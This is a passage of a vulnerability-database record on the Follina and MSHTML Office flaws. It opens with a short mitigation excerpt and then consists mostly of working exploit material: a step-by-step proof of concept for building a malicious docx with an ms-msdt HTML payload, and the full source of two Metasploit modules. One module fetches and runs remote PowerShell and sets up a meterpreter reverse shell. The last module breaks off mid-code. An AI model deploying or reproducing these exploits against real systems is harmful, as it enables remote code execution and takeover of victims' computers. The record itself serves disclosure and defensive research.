Execute the command \u201creg delete HKEY_CLASSES_ROOT\\search-ms /f\u201d.\n\nAs with all workarounds, it\u2019s on you to vet and investigate before deploying them.\n\nThere\u2019s more detail from the [nao_sec](<https://twitter.com/nao_sec>) cyber security research team [here](<https://twitter.com/nao_sec/status/1530196847679401984>).\n\n\n\nSANS have produced an analysis and remediation video [here](<https://www.youtube.com/watch?v=vHW_hb2m_pw>).\n\n * 19:20 Mitigations\n * 27:50 Detecting\n\n### Why is it called Follina?\n\nHere's [why](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>), thanks [@GossiTheDog](<https://twitter.com/GossiTheDog>)!\n\nThe post [Follina 0day exploit. Malicious code execution in Office docs](<https://www.pentestpartners.com/security-blog/follina-0day-exploit-malicious-code-execution-in-office-docs/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T05:38:30", "type": "pentestpartners", "title": "Follina 0day exploit. 
Malicious code execution in Office docs", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-01T05:38:30", "id": "PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93", "href": "https://www.pentestpartners.com/security-blog/follina-0day-exploit-malicious-code-execution-in-office-docs/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-05-31T17:41:58", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "packetstorm", "title": "Microsoft Office MSDT Follina Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44444", "CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "PACKETSTORM:167317", "href": "https://packetstormsecurity.com/files/167317/Microsoft-Office-MSDT-Follina-Proof-Of-Concept.html", "sourceData": "`# POC CVE-2022-30190 : CVE 0-day MS Office RCE aka msdt follina \n \n> Info : [New Microsoft Office zero-day used in attacks to execute PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/) \n \n## Summary \n \nOn the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research \nTeam, discovered a malicious Office document shared on Virustotal. This document is \nusing an unusual, but known scheme to infect its victims. The scheme was not detected as \nmalicious by some EDR, like Microsoft Defender for Endpoint. This vulnerability could lead to \ncode execution without the need for user interaction, as it does not involve macros, except if the \nProtected View mode is enabled. There is no CVE number attributed yet. \n \n \n## Technical Details \n \nThe vulnerability is being exploited by using the MSProtocol URI scheme to load some code. \nAttackers could embed malicious links inside Microsoft Office documents, templates or emails \nbeginning with ms-msdt: that will be loaded and executed afterward without user interaction \n- except if the Protected View mode is enabled. Nevertheless, converting the document to \nthe RTF format could also bypass the Protected View feature. \n \n## Proof of Concept \n \nMS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme \"ms-msdt:\" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters). \n \nThe result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros). 
\n \nHere are the steps to build a Proof-of-Concept docx: \n \n1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx. \n \n2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute \n \n``` \nType=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" \n``` \n \nand `Target=\"embeddings/oleObject1.bin\"` by changing the `Target` value and adding attribute `TargetMode`: \n \n``` \nTarget = \"http://<payload_server>/payload.html!\" \nTargetMode = \"External\" \n``` \n \nNote the Id value (probably it is \"rId5\"). \n \n3. Edit `word/document.xml`. Search for the \"<o:OLEObject ..>\" tag (with `r:id=\"rId5\"`) and change the attribute from `Type=\"Embed\"` to `Type=\"Link\"` and add the attribute `UpdateMode=\"OnCall\"`. \n \nNOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444). \n \n4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`: \n \n``` \n<!doctype html> \n<html lang=\"en\"> \n<body> \n<script> \n//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times \nwindow.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \\\"\"; \n</script> \n \n</body> \n</html> \n``` \n \nNote that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason). 
\n \n## BONUS (0-click RTF version) \n \nIf you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3: \n \n``` \n<o:LinkType>EnhancedMetaFile</o:LinkType> \n<o:LockedField>false</o:LockedField> \n<o:FieldCodes>\\f 0</o:FieldCodes> \n``` \n \nthen it'll work as RTF also (open the resulting docx and save it as RTF). \n \nWith RTF, there is no need to open the file in Word; it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. \n \n## Sources: \n \n- https://nao-sec.org/about \n- https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection \n- https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 \n- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167317/msdt-poc.txt"}, {"lastseen": "2021-12-09T15:33:23", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-09T00:00:00", "type": "packetstorm", "title": "Microsoft Office Word MSHTML Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-09T00:00:00", "id": "PACKETSTORM:165214", "href": "https://packetstormsecurity.com/files/165214/Microsoft-Office-Word-MSHTML-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Office Word Malicious MSHTML RCE', \n'Description' => %q{ \nThis module creates a malicious docx file that when opened in Word on a vulnerable Windows \nsystem will lead to code execution. This vulnerability exists because an attacker can \ncraft a malicious ActiveX control to be used by a Microsoft Office document that hosts \nthe browser rendering engine. \n}, \n'References' => [ \n['CVE', '2021-40444'], \n['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'], \n['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'], \n['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'], \n['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'], \n['URL', 'https://github.com/klezVirus/CVE-2021-40444'] \n], \n'Author' => [ \n'lockedbyte ', # Vulnerability discovery. \n'klezVirus ', # References and PoC. \n'thesunRider', # Official Metasploit module. \n'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring. 
\n], \n'DisclosureDate' => '2021-09-23', \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'Payload' => { \n'DisableNops' => true \n}, \n'DefaultOptions' => { \n'FILENAME' => 'msf.docx' \n}, \n'Targets' => [ \n[ \n'Hosted', {} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true]) \n]) \nregister_advanced_options([ \nOptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]), \n]) \nend \n \ndef bin_to_hex(bstr) \nreturn(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join) \nend \n \ndef cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\") \nchecksum = seed \n \nbytes = '' \ndata.chars.each_slice(4).map(&:join).each do |dword| \nif dword.length == 4 \nchecksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*') \nelse \nbytes = dword \nend \nend \nchecksum = checksum.reverse \n \ncase (data.length % 4) \nwhen 3 \ndword = \"\\x00#{bytes}\" \nwhen 2 \ndword = \"\\x00\\x00#{bytes}\" \nwhen 1 \ndword = \"\\x00\\x00\\x00#{bytes}\" \nelse \ndword = \"\\x00\\x00\\x00\\x00\" \nend \n \nchecksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse \nend \n \n# http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf \ndef create_cab(data) \ncab_cfdata = '' \nfilename = \"../#{File.basename(@my_resources.first)}.inf\" \nblock_size = 32768 \nstruct_cffile = 0xd \nstruct_cfheader = 0x30 \n \nblock_counter = 0 \ndata.chars.each_slice(block_size).map(&:join).each do |block| \nblock_counter += 1 \n \nseed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\" \ncsum = cab_checksum(block, seed) \n \nvprint_status(\"Data block added w/ checksum: 
#{bin_to_hex(csum)}\") \ncab_cfdata << csum # uint32 {4} - Checksum \ncab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length \ncab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length \ncab_cfdata << block \nend \n \ncab_size = [ \nstruct_cfheader + \nstruct_cffile + \nfilename.length + \ncab_cfdata.length \n].pack('L<') \n \n# CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB) \ncab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF) \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null) \ncab_header << cab_size # uint32 {4} - Archive Length \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null) \n \ncab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null) \ncab_header << \"\\x03\" # byte {1} - Minor Version (3) \ncab_header << \"\\x01\" # byte {1} - Major Version (1) \ncab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders \ncab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files \ncab_header << \"\\x00\\x00\" # uint16 {2} - Flags \n \ncab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number \ncab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set \n \n# CFFOLDER \ncab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder \nstruct_cfheader + \nstruct_cffile + \nfilename.length \n].pack('L<') \ncab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder \ncab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP) \n \n# increase file size to trigger vulnerability \ncab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\") \ndata.length + 1073741824 \n].pack('L<') \n \n# set current date and time in the format of cab file \ndate_time = Time.new \ndate = [((date_time.year - 1980) << 9) + 
(date_time.month << 5) + date_time.day].pack('S') \ntime = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S') \n \n# CFFILE \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder) \ncab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0) \ncab_header << date # uint16 {2} - File Date (\\x5A\\x53) \ncab_header << time # uint16 {2} - File Time (\\xC3\\x5C) \ncab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes \ncab_header << filename # byte {X} - Filename (ASCII) \ncab_header << \"\\x00\" # byte {1} - null Filename Terminator \n \ncab_stream = cab_header \n \n# CFDATA \ncab_stream << cab_cfdata \nend \n \ndef generate_html \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\" \ninf = \"#{File.basename(@my_resources.first)}.inf\" \n \nfile_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js') \njs_content = ::File.binread(file_path) \n \njs_content.gsub!('REPLACE_INF', inf) \njs_content.gsub!('REPLACE_URI', uri) \nif datastore['OBFUSCATE'] \nprint_status('Obfuscate JavaScript content') \n \njs_content = Rex::Exploitation::JSObfu.new js_content \njs_content = js_content.obfuscate(memory_sensitive: false) \nend \n \nhtml = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>' \nhtml += js_content.to_s \nhtml += '</script></body></html>' \nhtml \nend \n \ndef get_file_in_docx(fname) \ni = @docx.find_index { |item| item[:fname] == fname } \n \nunless i \nfail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\") \nend \n \n@docx.fetch(i)[:data] \nend \n \ndef get_template_path \ndatastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 
'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx') \nend \n \ndef inject_docx \ndocument_xml = get_file_in_docx('word/document.xml') \nunless document_xml \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml') \nend \n \ndocument_xml_rels = get_file_in_docx('word/_rels/document.xml.rels') \nunless document_xml_rels \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels') \nend \n \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\" \n@docx.each do |entry| \ncase entry[:fname] \nwhen 'word/document.xml' \nentry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s) \nwhen 'word/_rels/document.xml.rels' \nentry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\") \nend \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * '/' \n \nnew_str = new_str.gsub!('//', '/') while new_str.index('//') \n \n# makes sure there's a starting slash \nunless new_str[0, 1] == '/' \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef on_request_uri(cli, request) \nheader_cab = { \n'Access-Control-Allow-Origin' => '*', \n'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS', \n'Cache-Control' => 'no-store, no-cache, must-revalidate', \n'Content-Type' => 'application/octet-stream', \n'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\" \n} \n \nheader_html = { \n'Access-Control-Allow-Origin' => '*', \n'Access-Control-Allow-Methods' => 'GET, POST', \n'Cache-Control' => 'no-store, no-cache, must-revalidate', \n'Content-Type' => 'text/html; charset=UTF-8' \n} \n \nif request.method.eql? 'HEAD' \nif request.raw_uri.to_s.end_with? '.cab' \nsend_response(cli, '', header_cab) \nelse \nsend_response(cli, '', header_html) \nend \nelsif request.method.eql? 
'OPTIONS' \nresponse = create_response(501, 'Unsupported Method') \nresponse['Content-Type'] = 'text/html' \nresponse.body = '' \n \ncli.send_response(response) \nelsif request.raw_uri.to_s.end_with? '.html' \nprint_status('Sending HTML Payload') \n \nsend_response_html(cli, generate_html, header_html) \nelsif request.raw_uri.to_s.end_with? '.cab' \nprint_status('Sending CAB Payload') \n \nsend_response(cli, create_cab(@dll_payload), header_cab) \nend \nend \n \ndef pack_docx \n@docx.each do |entry| \nif entry[:data].is_a?(Nokogiri::XML::Document) \nentry[:data] = entry[:data].to_s \nend \nend \n \nMsf::Util::EXE.to_zip(@docx) \nend \n \ndef unpack_docx(template_path) \ndocument = [] \n \nZip::File.open(template_path) do |entries| \nentries.each do |entry| \nif entry.name.match(/\\.xml|\\.rels$/i) \ncontent = Nokogiri::XML(entry.get_input_stream.read) if entry.file? \nelsif entry.file? \ncontent = entry.get_input_stream.read \nend \n \nvprint_status(\"Parsing item from template: #{entry.name}\") \n \ndocument << { fname: entry.name, data: content } \nend \nend \n \ndocument \nend \n \ndef primer \nprint_status('CVE-2021-40444: Generate a malicious docx file') \n \n@proto = (datastore['SSL'] ? 
'https' : 'http') \nif datastore['SRVHOST'] == '0.0.0.0' \ndatastore['SRVHOST'] = Rex::Socket.source_address \nend \n \ntemplate_path = get_template_path \nunless File.extname(template_path).match(/\\.docx$/i) \nfail_with(Failure::BadConfig, 'Template is not a docx file!') \nend \n \nprint_status(\"Using template '#{template_path}'\") \n@docx = unpack_docx(template_path) \n \nprint_status('Injecting payload in docx document') \ninject_docx \n \nprint_status(\"Finalizing docx '#{datastore['FILENAME']}'\") \nfile_create(pack_docx) \n \n@dll_payload = Msf::Util::EXE.to_win64pe_dll( \nframework, \npayload.encoded, \n{ \narch: payload.arch.first, \nmixed_mode: true, \nplatform: 'win' \n} \n) \nend \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/165214/word_mshtml_rce.rb.txt"}, {"lastseen": "2022-06-07T16:53:04", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "packetstorm", "title": "Microsoft Office Word MSDTJS Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T00:00:00", "id": "PACKETSTORM:167438", "href": "https://packetstormsecurity.com/files/167438/Microsoft-Office-Word-MSDTJS-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Office Word MSDTJS', \n'Description' => %q{ \nThis module generates a malicious Microsoft Word document that when loaded, will leverage the remote template \nfeature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code. \n}, \n'References' => [ \n['CVE', '2022-30190'], \n['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'], \n['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'], \n['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'], \n['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'], \n['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'], \n['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190'] \n], \n'Author' => [ \n'nao sec', # Original disclosure. 
\n'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop CyberSecurity \n], \n'DisclosureDate' => '2022-05-29', \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Payload' => { \n'DisableNops' => true \n}, \n'DefaultOptions' => { \n'DisablePayloadHandler' => false, \n'FILENAME' => 'msf.docx', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'SRVHOST' => Rex::Socket.source_address('1.2.3.4') \n}, \n'Targets' => [ \n[ 'Microsoft Office Word', {} ] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['Follina'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']), \nOptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true]) \n]) \nend \n \ndef get_file_in_docx(fname) \ni = @docx.find_index { |item| item[:fname] == fname } \n \nunless i \nfail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\") \nend \n \n@docx.fetch(i)[:data] \nend \n \ndef get_template_path \ndatastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx') \nend \n \ndef generate_html \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1\" \n \ndummy = '' \n(1..random_int(61, 100)).each do |_n| \ndummy += '//' + rand_text_alpha(100) + \"\\n\" \nend \n \ncmd = Rex::Text.encode_base64(\"IEX(New-Object Net.WebClient).downloadString('#{uri}')\") \n \njs_content = \"window.location.href = \\\"ms-msdt:/id PCWDiagnostic /skip force /param \\\\\\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed 
IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\\\\\"\\\";\" \nif datastore['OBFUSCATE'] \nprint_status('Obfuscate JavaScript content') \n \njs_content = Rex::Exploitation::JSObfu.new js_content \njs_content = js_content.obfuscate(memory_sensitive: false) \nend \n \nhtml = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>' \nhtml += \"\\n#{dummy}\\n#{js_content}\\n\" \nhtml += '</script></body></html>' \n \nhtml \nend \n \ndef inject_docx \ndocument_xml = get_file_in_docx('word/document.xml') \nunless document_xml \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml') \nend \n \ndocument_xml_rels = get_file_in_docx('word/_rels/document.xml.rels') \nunless document_xml_rels \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels') \nend \n \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\" \n@docx.each do |entry| \ncase entry[:fname] \nwhen 'word/_rels/document.xml.rels' \nentry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"#{uri}!\") \nend \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * '/' \n \nnew_str = new_str.gsub!('//', '/') while new_str.index('//') \n \n# makes sure there's a starting slash \nunless new_str.start_with?('/') \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef on_request_uri(cli, request) \nheader_html = { \n'Access-Control-Allow-Origin' => '*', \n'Access-Control-Allow-Methods' => 'GET, POST', \n'Cache-Control' => 'no-store, no-cache, must-revalidate', \n'Content-Type' => 'text/html; 
charset=UTF-8' \n} \n \nif request.method.eql? 'HEAD' \nsend_response(cli, '', header_html) \nelsif request.method.eql? 'OPTIONS' \nresponse = create_response(501, 'Unsupported Method') \nresponse['Content-Type'] = 'text/html' \nresponse.body = '' \n \ncli.send_response(response) \nelsif request.raw_uri.to_s.end_with? '.html' \nprint_status('Sending HTML Payload') \n \nsend_response_html(cli, generate_html, header_html) \nelsif request.raw_uri.to_s.end_with? '.ps1' \nprint_status('Sending PowerShell Payload') \n \nsend_response(cli, @payload_data, header_html) \nend \nend \n \ndef pack_docx \n@docx.each do |entry| \nif entry[:data].is_a?(Nokogiri::XML::Document) \nentry[:data] = entry[:data].to_s \nend \nend \n \nMsf::Util::EXE.to_zip(@docx) \nend \n \ndef primer \nprint_status('Generating a malicious docx file') \n \n@proto = (datastore['SSL'] ? 'https' : 'http') \n \ntemplate_path = get_template_path \nunless File.extname(template_path).downcase.end_with?('.docx') \nfail_with(Failure::BadConfig, 'Template is not a docx file!') \nend \n \nprint_status(\"Using template '#{template_path}'\") \n@docx = unpack_docx(template_path) \n \nprint_status('Injecting payload in docx document') \ninject_docx \n \nprint_status(\"Finalizing docx '#{datastore['FILENAME']}'\") \nfile_create(pack_docx) \n \n@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true) \n \nsuper \nend \n \ndef random_int(min, max) \nrand(max - min) + min \nend \n \ndef unpack_docx(template_path) \ndocument = [] \n \nZip::File.open(template_path) do |entries| \nentries.each do |entry| \nif entry.name.downcase.end_with?('.xml', '.rels') \ncontent = Nokogiri::XML(entry.get_input_stream.read) if entry.file? \nelsif entry.file? 
